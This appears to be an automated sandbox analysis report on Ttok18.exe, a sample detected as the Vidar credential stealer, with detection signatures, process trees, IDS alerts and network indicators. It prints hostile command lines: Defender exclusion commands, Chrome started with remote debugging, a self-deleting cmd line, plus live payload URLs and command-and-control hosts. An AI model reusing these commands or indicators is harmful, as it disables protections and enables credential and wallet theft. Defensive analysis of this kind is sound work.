
Windows Analysis Report
Ttok18.exe

Overview

General Information

Sample name: Ttok18.exe
Analysis ID: 1568488
MD5: 3544b39481484f67f807e54dd58a93d6
SHA1: 36691434d2adbb78798bd87090a44e011a4188b8
SHA256: ba979aec878047d3191de74aeed1cb884802da8a1bda6ad8323d5bfae9d528fe
Tags: exe, user-aachum

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Powershell Defender Exclusion
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Ttok18.exe (PID: 736 cmdline: "C:\Users\user\Desktop\Ttok18.exe" MD5: 3544B39481484F67F807E54DD58A93D6)
    • conhost.exe (PID: 4080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2472 cmdline: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\AAxBDhzeE MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • powershell.exe (PID: 7300 cmdline: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • powershell.exe (PID: 7548 cmdline: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • 25aac720-4b65-4596-94df-b9a776dc62c7.exe (PID: 8080 cmdline: "C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe" MD5: F453C5F8C736FF8C381E7022CAD85E3E)
      • chrome.exe (PID: 5696 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 5020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2180,i,4947375458311631145,18082190832004734882,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • cmd.exe (PID: 976 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\TRQIE37YCBIM" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 2176 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • svchost.exe (PID: 2536 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: 25aac720-4b65-4596-94df-b9a776dc62c7.exe PID: 8080 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
Process Memory Space: 25aac720-4b65-4596-94df-b9a776dc62c7.exe PID: 8080 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'", CommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ttok18.exe", ParentImage: C:\Users\user\Desktop\Ttok18.exe, ParentProcessId: 736, ParentProcessName: Ttok18.exe, ProcessCommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'", ProcessId: 2472, ProcessName: powershell.exe
Source: Process started | Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe" , ParentImage: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe, ParentProcessId: 8080, ParentProcessName: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 5696, ProcessName: chrome.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'", CommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ttok18.exe", ParentImage: C:\Users\user\Desktop\Ttok18.exe, ParentProcessId: 736, ParentProcessName: Ttok18.exe, ProcessCommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'", ProcessId: 2472, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'", CommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ttok18.exe", ParentImage: C:\Users\user\Desktop\Ttok18.exe, ParentProcessId: 736, ParentProcessName: Ttok18.exe, ProcessCommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'", ProcessId: 2472, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2536, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-04T17:04:35.430618+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 159.69.102.165 | 443 | 192.168.2.4 | 49742 | TCP
2024-12-04T17:04:37.730347+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 159.69.102.165 | 443 | 192.168.2.4 | 49743 | TCP
2024-12-04T17:04:37.730153+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.4 | 49743 | 159.69.102.165 | 443 | TCP


AV Detection

Source: https://kresk.lol/% | Avira URL Cloud: Label: malware
Source: https://kresk.lol/a | Avira URL Cloud: Label: malware
Source: https://kresk.lol/ | Avira URL Cloud: Label: malware
Source: https://kresk.lol | Avira URL Cloud: Label: malware
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | ReversingLabs: Detection: 44%
Source: Ttok18.exe | ReversingLabs: Detection: 18%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Joe Sandbox ML: detected
Source: Ttok18.exe | Joe Sandbox ML: detected
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0041D1E7 CryptUnprotectData, 15_2_0041D1E7
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0041FC3B CryptStringToBinaryA, CryptStringToBinaryA, 15_2_0041FC3B
Source: unknown | HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 159.69.102.165:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: Ttok18.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\danie\source\repos\Qwest\Qwest\obj\Debug\Qwest.pdb | source: Ttok18.exe
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0043A0AE FindFirstFileA, 15_2_0043A0AE
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0041E359 FindFirstFileA, FindFirstFileA, 15_2_0041E359
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00420370 FindFirstFileA, FindFirstFileA, 15_2_00420370
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_004028FC FindFirstFileA, 15_2_004028FC
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0042498B FindFirstFileA, FindFirstFileA, 15_2_0042498B
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0043CE58 FindFirstFileA, 15_2_0043CE58
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_004390C5 FindFirstFileA, memset, memset, 15_2_004390C5
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0043B345 wsprintfA, wsprintfA, FindFirstFileA, 15_2_0043B345
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00421F18 FindFirstFileA, 15_2_00421F18
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00402AA5 FindFirstFileA, 15_2_00402AA5
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_004214F2 FindFirstFileA, FindFirstFileA, 15_2_004214F2
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00439CA9 GetLogicalDriveStringsA, 15_2_00439CA9
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\Ttok18.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h | 0_2_011E2309
Source: chrome.exe | Memory has grown: Private usage: 9MB later: 41MB

Networking

Source: Network traffic | Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49743 -> 159.69.102.165:443
Source: Network traffic | Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 159.69.102.165:443 -> 192.168.2.4:49742
Source: Network traffic | Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 159.69.102.165:443 -> 192.168.2.4:49743
Source: global traffic | HTTP traffic detected: GET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1 | Host: github.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /m3wm0w HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 20.233.83.145
Source: Joe Sandbox View | IP Address: 185.199.111.133
Source: Joe Sandbox View | IP Address: 149.154.167.99
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00418024 InternetReadFile, 15_2_00418024
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 | Host: kresk.lol | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 | Host: www.google.com | Connection: keep-alive | X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc= | Sec-Fetch-Site: none | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1 | Host: www.google.com | Connection: keep-alive | Sec-Fetch-Site: none | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 | Host: www.google.com | Connection: keep-alive | X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc= | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /async/newtab_promos HTTP/1.1 | Host: www.google.com | Connection: keep-alive | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | DNS traffic detected: DNS query: github.com
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: t.me
Source: global traffic | DNS traffic detected: DNS query: kresk.lol
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----WB1V3OP8YMYM7YMGD2N7 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 | Host: kresk.lol | Content-Length: 256 | Connection: Keep-Alive | Cache-Control: no-cache
            Source: Ttok18.exe, 00000000.00000002.1998627591.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
            Source: powershell.exe, 0000000B.00000002.1865159775.0000000005196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: Ttok18.exeString found in binary or memory: https://github.com/olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe
            Source: W4OHLX.15.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.0000000000842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kresk.lol
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000003.2065346225.0000000000874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kresk.lol/
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000003.2042357919.0000000000874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kresk.lol/%
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000003.2042357919.0000000000874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kresk.lol/a
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://kresk.lolIM7GLNO8
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://kresk.loltosh;
            Source: powershell.exe, 00000004.00000002.1763834008.000000000590A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1807167831.00000000058AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1881604407.00000000060AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: svchost.exe, 00000011.00000003.2174104393.000002A4586C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
            Source: edb.log.17.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
            Source: Ttok18.exe, 00000000.00000002.1998627591.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
            Source: Ttok18.exe, 00000000.00000002.1998627591.0000000002EC5000.00000004.00000800.00020000.00000000.sdmp, Ttok18.exe, 00000000.00000002.1998627591.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe
            Source: Ttok18.exe, 00000000.00000002.2001059620.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000000.1992854779.000000000045C000.00000008.00000001.01000000.00000008.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619p1up1Mozilla/5.0
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758763558.0000000003EE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758763558.0000000003EE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000036EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000036C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000036EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000036C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
            Source: Ttok18.exe, 00000000.00000002.2001059620.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000003.2015843390.000000000087C000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000003.2015843390.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000000.1992854779.000000000045C000.00000008.00000001.01000000.00000008.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.0000000000842000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe.0.drString found in binary or memory: https://t.me/m3wm0w
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.0000000000842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m3wm0wG
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.0000000000842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m3wm0wQ
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe.0.drString found in binary or memory: https://t.me/m3wm0wp1up1Mozilla/5.0
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000003.2015843390.000000000087C000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000003.2015843390.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.0000000000842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
